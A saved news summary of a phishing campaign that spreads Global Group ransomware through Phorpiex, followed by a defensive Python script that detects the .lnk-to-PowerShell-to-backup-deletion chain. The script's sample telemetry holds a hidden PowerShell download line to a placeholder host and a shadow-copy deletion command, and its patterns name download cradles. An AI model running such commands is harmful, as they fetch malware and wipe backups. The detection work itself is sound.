Saved February 14, 2026
Do you care about this?
Researchers found a phishing campaign using Phorpiex malware to spread Global Group ransomware. The attack uses deceptive file names to trick users into opening a Windows shortcut that fetches the ransomware, which then encrypts files offline, making recovery nearly impossible. It also deletes backups to cover its tracks.
If you do, here's more
Forcepoint X-Labs has uncovered a phishing campaign leveraging Phorpiex malware to distribute Global Group ransomware. This attack, ongoing through 2024 and 2025, often begins with an innocuous email titled “Your Document,” which tricks users into clicking on an attachment that appears harmless. The attachment uses a double extension, disguising a Windows shortcut file (.lnk) as a standard document. Once opened, it abuses legitimate Windows tools such as PowerShell to execute commands that download the ransomware, which is saved under innocuous names such as windrv.exe.
Global Group ransomware is particularly concerning because it operates in “mute” mode, meaning it encrypts files without needing to contact an external server. This allows it to run even on computers that are offline. The encryption uses the ChaCha20-Poly1305 algorithm, so files cannot realistically be recovered without the criminals’ key. In addition, the malware is designed to erase its traces by deleting backups and its own files after executing its payload, making detection and recovery difficult.
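The chain described above (a double-extension .lnk attachment, PowerShell pulling down a binary such as windrv.exe, and backup deletion before encryption) is something endpoint telemetry can flag at each stage. The script below is an added example for defenders, not code from the article or from Forcepoint: it parses a few constructed process-creation events in an assumed pipe-delimited format, tags each stage, and reports when the full chain appears. The sample file names, the download command, the `example.invalid` URL and the shadow-copy deletion command are constructed test fixtures; the backup-deletion pattern assumes the common `vssadmin`/`wmic`/`wbadmin` commands, which the article does not name.

```python
"""Stage-by-stage detection sketch for a double-extension .lnk -> PowerShell
download -> backup-deletion chain. Added example; not the article's code."""
import re
from dataclasses import dataclass

@dataclass
class ProcEvent:
    ts: str        # timestamp
    parent: str    # parent process image name
    image: str     # process image name
    cmdline: str   # full command line

# Constructed sample telemetry (assumed format: timestamp|parent|image|command line).
# None of these lines come from a real incident.
SAMPLE_EVENTS = """\
2025-03-01T09:12:03Z|outlook.exe|explorer.exe|explorer.exe "C:\\Users\\u\\Downloads\\Your Document.pdf.lnk"
2025-03-01T09:12:04Z|explorer.exe|powershell.exe|powershell.exe -w hidden -c "iwr http://example.invalid/windrv.exe -OutFile $env:TEMP\\windrv.exe"
2025-03-01T09:12:09Z|powershell.exe|windrv.exe|C:\\Users\\u\\AppData\\Local\\Temp\\windrv.exe
2025-03-01T09:12:30Z|windrv.exe|vssadmin.exe|vssadmin.exe delete shadows /all /quiet
2025-03-01T09:15:00Z|explorer.exe|winword.exe|winword.exe "C:\\Users\\u\\Documents\\report.docx"
2025-03-01T09:16:00Z|explorer.exe|powershell.exe|powershell.exe -File C:\\scripts\\inventory.ps1
"""

# A document-looking extension immediately followed by .lnk (e.g. "report.pdf.lnk").
DOUBLE_EXT_LNK = re.compile(r'[^\\/"]+\.(pdf|docx?|xlsx?|txt)\.lnk\b', re.IGNORECASE)
# Common PowerShell download cradles (assumed list, extend for your environment).
DOWNLOAD_CRADLE = re.compile(
    r'\b(iwr|invoke-webrequest|curl|wget|downloadfile|downloadstring|start-bitstransfer)\b',
    re.IGNORECASE)
# Common backup / shadow-copy deletion commands (assumed, not named in the article).
SHADOW_DELETE = re.compile(
    r'vssadmin(\.exe)?\s+delete\s+shadows|wmic.*shadowcopy\s+delete|wbadmin(\.exe)?\s+delete',
    re.IGNORECASE)

def parse_events(text):
    """Parse pipe-delimited lines into ProcEvent records; blank lines are skipped."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, parent, image, cmdline = line.split("|", 3)
        events.append(ProcEvent(ts, parent, image, cmdline))
    return events

def has_double_extension_lnk(cmdline):
    return bool(DOUBLE_EXT_LNK.search(cmdline))

def tag_event(ev):
    """Return the list of chain stages this single event matches."""
    tags = []
    if has_double_extension_lnk(ev.cmdline):
        tags.append("double-extension-lnk")
    # PowerShell launched from the shell (explorer.exe) with a download cradle:
    # the .lnk-triggered download step described in the article.
    if (ev.image.lower() == "powershell.exe"
            and ev.parent.lower() == "explorer.exe"
            and DOWNLOAD_CRADLE.search(ev.cmdline)):
        tags.append("powershell-download-from-shell")
    if SHADOW_DELETE.search(ev.cmdline):
        tags.append("backup-deletion")
    return tags

def summarize(text):
    """Tag every event and report whether all three chain stages were seen."""
    findings = []
    stages = set()
    for ev in parse_events(text):
        tags = tag_event(ev)
        if tags:
            findings.append((ev.ts, ev.image, tags))
            stages.update(tags)
    chain = {"double-extension-lnk", "powershell-download-from-shell",
             "backup-deletion"} <= stages
    return {"findings": findings, "stages": stages, "chain": chain}

if __name__ == "__main__":
    result = summarize(SAMPLE_EVENTS)
    for ts, image, tags in result["findings"]:
        print(ts, image, ", ".join(tags))
    print("full chain detected:", result["chain"])
```

Each stage alone is a medium-confidence signal (a benign `.pdf.lnk` or an admin running `vssadmin` both happen), which is why `summarize` escalates only when all three appear on the same host; the `-File inventory.ps1` event shows that ordinary PowerShell use from the shell is not tagged.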
The campaign highlights the effectiveness of simple tactics in cyberattacks. Users are often caught off guard by seemingly mundane emails and attachments. The takeaway is clear: exercise caution with unsolicited emails, avoid clicking on links, and refrain from downloading attachments from unknown sources.